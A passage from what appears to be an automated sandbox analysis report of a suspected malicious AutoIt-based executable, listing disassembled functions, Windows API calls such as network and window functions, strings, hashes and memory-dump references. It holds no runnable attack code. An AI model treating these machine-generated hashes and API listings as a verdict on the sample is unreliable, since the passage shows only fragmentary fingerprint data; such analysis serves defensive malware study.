                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ContainedObject
                                              • String ID: AutoIt3GUI$Container
                                              • API String ID: 3565006973-3941886329
                                              • Opcode ID: f4597f1626e60dd7c340e8c282b618fb013c57aeec37e6df6e7ac401e8e76751
                                              • Instruction ID: b2dafc0de4b592ba236d81e6bc5c7682f9f7202ed8eb534811dbb1c8f7265abd
                                              • Opcode Fuzzy Hash: f4597f1626e60dd7c340e8c282b618fb013c57aeec37e6df6e7ac401e8e76751
                                              • Instruction Fuzzy Hash: A2915970604601AFDB14DF64C894E6AB7F9FF49700F2485AEE95ACB3A2DB71E841CB50
                                              Function 00BBAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              • __wcsnicmp.LIBCMT ref: 00BBB02D
                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00BBB0F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                              • String ID: LPT
                                              • API String ID: 3222508074-1350329615
                                              • Opcode ID: 6447083e2e4324ceaececfd80d2dd20077d8a724d55827597c9e5d2389a3079b
                                              • Instruction ID: 5ddd50e1576a1d45483681608d5f04f161dec2ca3adae5a4e68338c1adc44c03
                                              • Opcode Fuzzy Hash: 6447083e2e4324ceaececfd80d2dd20077d8a724d55827597c9e5d2389a3079b
                                              • Instruction Fuzzy Hash: 03613C75A10219AFCB14EF98C891EFEB7F4EB09710F1440A9F956AB291D7B0AE44CB50
                                              Function 00B62957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNEL32(00000000), ref: 00B62968
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00B62981
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: GlobalMemorySleepStatus
                                              • String ID: @
                                              • API String ID: 2783356886-2766056989
                                              • Opcode ID: 943f2a2cc9b28e1e9cecdf5deaa5469e528a2c157a67883f8e84dbce0726019e
                                              • Instruction ID: 98bb8d7a6d1f628836663cba2e255096d602cf4398d5f92825640ac3058f915c
                                              • Opcode Fuzzy Hash: 943f2a2cc9b28e1e9cecdf5deaa5469e528a2c157a67883f8e84dbce0726019e
                                              • Instruction Fuzzy Hash: B75137715087449BD320EF10D886BAFBBE8FB85345F41889DF6D8520A1DF71852DCB66
                                              Function 00BB9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B54F0B: __fread_nolock.LIBCMT ref: 00B54F29
                                              • _wcscmp.LIBCMT ref: 00BB9824
                                              • _wcscmp.LIBCMT ref: 00BB9837
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _wcscmp$__fread_nolock
                                              • String ID: FILE
                                              • API String ID: 4029003684-3121273764
                                              • Opcode ID: 5cf7354c7ed0bc95bd8a7aa3d333347544f90907cda6870c0d07208bcca9dc82
                                              • Instruction ID: 4d8f2a1c969d5c018ec2dc8628d1e22a5d5dd091499e4de9f69331b860eea55a
                                              • Opcode Fuzzy Hash: 5cf7354c7ed0bc95bd8a7aa3d333347544f90907cda6870c0d07208bcca9dc82
                                              • Instruction Fuzzy Hash: A041A771A00209BBDF219AA4CC86FEFBBF9DF85714F0044E9FA05A7181DBB199458B61
                                              Function 00BC258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BC259E
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00BC25D4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CrackInternet_memset
                                              • String ID: |
                                              • API String ID: 1413715105-2343686810
                                              • Opcode ID: 8479df644e3f2bd9fd0d416ebbdf45a6ffaef2e5a0709bb201b9e8b663e4c46a
                                              • Instruction ID: ba7e153ac77f96cd844b93e29dd6b7aa97e422f9740e94972b472a0a68c6d8c1
                                              • Opcode Fuzzy Hash: 8479df644e3f2bd9fd0d416ebbdf45a6ffaef2e5a0709bb201b9e8b663e4c46a
                                              • Instruction Fuzzy Hash: 68310771900119ABCF11EFA4DC85EEEBFB9FF08310F1040A9FD15A6162EA315A56DB60
                                              Function 00BD7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00BD7B61
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BD7B76
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: '
                                              • API String ID: 3850602802-1997036262
                                              • Opcode ID: fb179769f7145fcb260a652d21938c86bdf875bc1afb45240eac448090361244
                                              • Instruction ID: fcd08ca8be205e14b70a1c108980abb88bd4a4dfe248e958f3563e61abce90b6
                                              • Opcode Fuzzy Hash: fb179769f7145fcb260a652d21938c86bdf875bc1afb45240eac448090361244
                                              • Instruction Fuzzy Hash: C0410874A4520A9FDB14CF64D891BEABBF5FB09304F1041AAE904AB391FB70A951CF90
                                              Function 00BD6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(?,?,?,?), ref: 00BD6B17
                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BD6B53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$DestroyMove
                                              • String ID: static
                                              • API String ID: 2139405536-2160076837
                                              • Opcode ID: 228adba1ea41778561a42907ba75e8d4c75221d7fd9b3861b8962cf53816bf4f
                                              • Instruction ID: a0cb687115e5efad7e0cac0757cc80d166c39a5dd111deb3d2bae66114882b7a
                                              • Opcode Fuzzy Hash: 228adba1ea41778561a42907ba75e8d4c75221d7fd9b3861b8962cf53816bf4f
                                              • Instruction Fuzzy Hash: A4316E71100604AEDB109F64CC91BFBB7E9FF48760F10856AF9A5D7290EA35AC51C760
                                              Function 00BB28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BB2911
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BB294C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: 3507484d982dbb9153eac9dbea749fdd0555b033cb62916e3a5514fce7ae9474
                                              • Instruction ID: f64b5d9b2f178cf08e294511170e92a3c9342414f440a12902875c83c03271dc
                                              • Opcode Fuzzy Hash: 3507484d982dbb9153eac9dbea749fdd0555b033cb62916e3a5514fce7ae9474
                                              • Instruction Fuzzy Hash: 1931C131A003059BEB24DF58DD85BFEBBF8EF46350F1440B9E9D9A61A0D7B09940CB51
                                              Function 00BC39E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                              Download Yara Rule
                                              APIs
                                              • __snwprintf.LIBCMT ref: 00BC3A66
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __snwprintf_memmove
                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                              • API String ID: 3506404897-2584243854
                                              • Opcode ID: 6a380eda821be52862eabbdf852cc0561d31c75f265d88b1ce22227728f8a5fa
                                              • Instruction ID: 926ce9b5aba25c0c330b4996a621f99b9cc593c0b07114f68c574f9f1cc37ac8
                                              • Opcode Fuzzy Hash: 6a380eda821be52862eabbdf852cc0561d31c75f265d88b1ce22227728f8a5fa
                                              • Instruction Fuzzy Hash: ED218C71700219AACF14EF64CC82FAE77F5EF48700F4084E9F945AB281DA30EA59CB61
                                              Function 00BD66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BD6761
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD676C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: Combobox
                                              • API String ID: 3850602802-2096851135
                                              • Opcode ID: 0cde7445c740b3113027285d1cb2c28290cfefa86b43c0cc0570061d2ab66f51
                                              • Instruction ID: f37654120aac28c6a340181e563cbef4a07a85dd992ffa248dba4cb516abaa8c
                                              • Opcode Fuzzy Hash: 0cde7445c740b3113027285d1cb2c28290cfefa86b43c0cc0570061d2ab66f51
                                              • Instruction Fuzzy Hash: 4F119071300209AFEF15CF54CC81EABB7AAEB983A8F10416AF91497391E635DC5187A0
                                              Function 00BD6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B51D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B51D73
                                                • Part of subcall function 00B51D35: GetStockObject.GDI32(00000011), ref: 00B51D87
                                                • Part of subcall function 00B51D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B51D91
                                              • GetWindowRect.USER32(00000000,?), ref: 00BD6C71
                                              • GetSysColor.USER32(00000012), ref: 00BD6C8B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                              • String ID: static
                                              • API String ID: 1983116058-2160076837
                                              • Opcode ID: bc81ecbc88c7368ff073d5ea03b33a5aa191c6513b6fb3a203e946ba13cb9b14
                                              • Instruction ID: 466386e1cace4c381d7fc4a2fe2c88c3ad7024bc50b04fc2b8711d2447821327
                                              • Opcode Fuzzy Hash: bc81ecbc88c7368ff073d5ea03b33a5aa191c6513b6fb3a203e946ba13cb9b14
                                              • Instruction Fuzzy Hash: 4B211A7262020AAFDB04DFA8CC45AFABBE8FB08315F044569FD55D3250E635E850DB60
                                              Function 00BD6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowTextLengthW.USER32(00000000), ref: 00BD69A2
                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00BD69B1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: LengthMessageSendTextWindow
                                              • String ID: edit
                                              • API String ID: 2978978980-2167791130
                                              • Opcode ID: 2673d650f51f1f12aa7e4ed911aeff428096bf8294fceca37710ddcfd3f879e1
                                              • Instruction ID: db45d9faa89389073e63347dcfaec7434a9e2891f5eaf764d512495cfe36dd8c
                                              • Opcode Fuzzy Hash: 2673d650f51f1f12aa7e4ed911aeff428096bf8294fceca37710ddcfd3f879e1
                                              • Instruction Fuzzy Hash: F9119D71100109ABEB108E649C60AFBB7A9EB19378F504766F9A1972E0E739DC509760
                                              Function 00BB29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BB2A22
                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00BB2A41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: e5fa24d8b16200bf6359a011e8c6e1a966022f97092022c0fc64035b1b668513
                                              • Instruction ID: 7e2c00222a29e0f5276e1f26d8530223b34ac3ef30a97d4928e4d6b0e729e693
                                              • Opcode Fuzzy Hash: e5fa24d8b16200bf6359a011e8c6e1a966022f97092022c0fc64035b1b668513
                                              • Instruction Fuzzy Hash: D9119072901114EBDB35EB98DC44BFE77E8EB86314F1440A1E859E7290D7B0AD0ACB92
                                              Function 00BC21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00BC222C
                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00BC2255
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Internet$OpenOption
                                              • String ID: <local>
                                              • API String ID: 942729171-4266983199
                                              • Opcode ID: 7f81a6045521b15a2027f6f98b5a4047911bc91a814b4494825d127dc1312507
                                              • Instruction ID: 7e543f8c405227b18426c216c04ec2b434db76804af2c48ad099cb98ba4e1d4e
                                              • Opcode Fuzzy Hash: 7f81a6045521b15a2027f6f98b5a4047911bc91a814b4494825d127dc1312507
                                              • Instruction Fuzzy Hash: AE11CE70501226BADB298F118C84FFAFBE8FB06361F10826EF9059A000E2705D80D6F0
                                              Function 00BA8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00BA8E73
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
